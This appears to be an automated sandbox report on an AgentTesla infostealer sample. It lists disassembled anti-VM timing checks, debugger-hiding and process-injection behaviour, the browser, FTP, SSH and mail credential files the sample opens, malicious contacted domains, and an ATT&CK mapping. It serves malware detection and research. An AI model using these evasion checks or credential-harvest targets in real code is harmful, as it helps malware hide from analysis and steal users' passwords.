Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\caraganas.exe	RDTSC instruction interceptor: First address: 0000000002320156 second address: 0000000002320156 instructions:
Source: C:\Users\user\Desktop\caraganas.exe	RDTSC instruction interceptor: First address: 00000000023227B7 second address: 00000000023227B7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F0D5C842EE8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e test ch, ah 0x00000020 add edi, edx 0x00000022 dec ecx 0x00000023 cmp ecx, 00000000h 0x00000026 jne 00007F0D5C842ED1h 0x00000028 push ecx 0x00000029 call 00007F0D5C842F2Eh 0x0000002e call 00007F0D5C842EF8h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\caraganas.exe	RDTSC instruction interceptor: First address: 000000000232310C second address: 000000000232310C instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000B02E85 second address: 0000000000B02E85 instructions:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Function Chain: threadDelayed,memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,memAlloc,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\caraganas.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\caraganas.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe, 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE9
Source: RegAsm.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\caraganas.exe	RDTSC instruction interceptor: First address: 0000000002320156 second address: 0000000002320156 instructions:
Source: C:\Users\user\Desktop\caraganas.exe	RDTSC instruction interceptor: First address: 00000000023227B7 second address: 00000000023227B7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F0D5C842EE8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e test ch, ah 0x00000020 add edi, edx 0x00000022 dec ecx 0x00000023 cmp ecx, 00000000h 0x00000026 jne 00007F0D5C842ED1h 0x00000028 push ecx 0x00000029 call 00007F0D5C842F2Eh 0x0000002e call 00007F0D5C842EF8h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\caraganas.exe	RDTSC instruction interceptor: First address: 0000000002322948 second address: 0000000002322948 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F0D5D0180FDh 0x0000001d popad 0x0000001e call 00007F0D5D015C76h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\caraganas.exe	RDTSC instruction interceptor: First address: 000000000232310C second address: 000000000232310C instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000B02948 second address: 0000000000B02948 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F0D5D0180FDh 0x0000001d popad 0x0000001e call 00007F0D5D015C76h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000B02E85 second address: 0000000000B02E85 instructions:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_00B027A6 rdtsc

6_2_00B027A6

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Window / User API: threadDelayed 465

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5684	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5684	Thread sleep time: -13950000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5684	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: RegAsm.exe, 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe9
Source: RegAsm.exe, 00000006.00000002.602849189.000000001FD40000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000006.00000002.602849189.000000001FD40000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 00000006.00000002.602849189.000000001FD40000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000006.00000002.602849189.000000001FD40000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\caraganas.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\caraganas.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_00B027A6 rdtsc

6_2_00B027A6

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_1F99DDB0 LdrInitializeThunk,

6_2_1F99DDB0

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B040D0 mov eax, dword ptr fs:[00000030h]	6_2_00B040D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05122 mov eax, dword ptr fs:[00000030h]	6_2_00B05122
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B0514A mov eax, dword ptr fs:[00000030h]	6_2_00B0514A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B0514D mov eax, dword ptr fs:[00000030h]	6_2_00B0514D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B0263B mov eax, dword ptr fs:[00000030h]	6_2_00B0263B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B049BF mov eax, dword ptr fs:[00000030h]	6_2_00B049BF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B049C5 mov eax, dword ptr fs:[00000030h]	6_2_00B049C5

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\caraganas.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: B00000

Jump to behavior

Source: C:\Users\user\Desktop\caraganas.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\caraganas.exe'			Jump to behavior
Source: C:\Users\user\Desktop\caraganas.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\caraganas.exe'			Jump to behavior

Source: RegAsm.exe, 00000006.00000002.597355520.00000000013A0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000006.00000002.597355520.00000000013A0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000006.00000002.597355520.00000000013A0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: RegAsm.exe, 00000006.00000002.597355520.00000000013A0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2916, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2916, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2916, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Access Token Manipulation1	Virtualization/Sandbox Evasion34	OS Credential Dumping2	Query Registry1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection112	Disable or Modify Tools11	Input Capture1	Security Software Discovery631	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Access Token Manipulation1	Credentials in Registry1	Virtualization/Sandbox Evasion34	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Application Layer Protocol12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Process Discovery2	Distributed Component Object Model	Data from Local System2	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery314	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
caraganas.exe	19%	Metadefender		Browse
caraganas.exe	11%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://8vV1Qxo32XjttpL.org	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://DPtQpK.com	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://r3.i.lencr.org/06	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
googlehosted.l.googleusercontent.com	142.250.186.33	true	false	high
jesmar.net	31.193.225.171	true	true	unknown
doc-08-58-docs.googleusercontent.com	unknown	unknown	false	high
mail.jesmar.net	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://8vV1Qxo32XjttpL.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://r3.o.lencr.org0	RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.letsencrypt.org0	RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://DPtQpK.com	RegAsm.exe, 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.root-x1.letsencrypt.org0	RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.i.lencr.org/06	RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.186.33	unknown	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	358114
Start date:	25.02.2021
Start time:	03:38:05
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	caraganas.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/1@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 19.6% (good quality ratio 10.4%) Quality average: 34.6% Quality standard deviation: 38.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 187 Number of non-executed functions: 21
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 92.122.145.220, 40.88.32.150, 168.61.161.212, 52.147.198.201, 51.104.139.180, 142.250.74.206, 8.238.85.254, 67.27.159.254, 67.26.17.254, 8.252.5.126, 8.238.85.126, 51.103.5.159, 52.155.217.156, 92.122.213.247, 92.122.213.194, 20.54.26.129, 23.218.208.56 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/358114/sample/caraganas.exe

Simulations

Behavior and APIs

Time	Type	Description
03:39:40	API Interceptor	702x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
142.250.186.33	#U266b VM_540283.htm	Get hash	malicious	Browse
	_vm54959395930.htm	Get hash	malicious	Browse
	Malone3388_001.htm	Get hash	malicious	Browse
	dgaTCZovz.msi	Get hash	malicious	Browse
	2021-Nieuwepayroll-Aanpassing.html	Get hash	malicious	Browse
	PO112000891122110.exe	Get hash	malicious	Browse
	GUEROLA INDUSTRIES N#U00ba de cuenta.exe	Get hash	malicious	Browse
	xerox for hycite.htm	Get hash	malicious	Browse
	Muligheds.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
googlehosted.l.googleusercontent.com	#U266b VM_540283.htm	Get hash	malicious	Browse	142.250.186.33
	_vm54959395930.htm	Get hash	malicious	Browse	142.250.186.33
	Malone3388_001.htm	Get hash	malicious	Browse	142.250.186.33
	dgaTCZovz.msi	Get hash	malicious	Browse	142.250.186.33
	2021-Nieuwepayroll-Aanpassing.html	Get hash	malicious	Browse	142.250.186.33
	seed.exe	Get hash	malicious	Browse	142.250.186.33
	PO112000891122110.exe	Get hash	malicious	Browse	142.250.186.33
	GUEROLA INDUSTRIES N#U00ba de cuenta.exe	Get hash	malicious	Browse	142.250.186.33
	xerox for hycite.htm	Get hash	malicious	Browse	142.250.186.33
	Muligheds.exe	Get hash	malicious	Browse	142.250.186.33
	2021-Nouvelle masse salariale-Rapport.html	Get hash	malicious	Browse	216.58.209.33
	SOLICITUD DE HERJIMAR, SL (HJM-745022821).exe	Get hash	malicious	Browse	216.58.208.161
	#U6211#U662f#U56fe#U7247.exe	Get hash	malicious	Browse	216.58.208.161
	OneNote rmos@dataflex-int.com.html	Get hash	malicious	Browse	216.58.208.129
	Sponsor A Child, Best Online Donation Site, Top NGO - World Vision India.html	Get hash	malicious	Browse	172.217.20.225
	barcelona-v-psg-liv-uefa-2021.html	Get hash	malicious	Browse	172.217.20.225
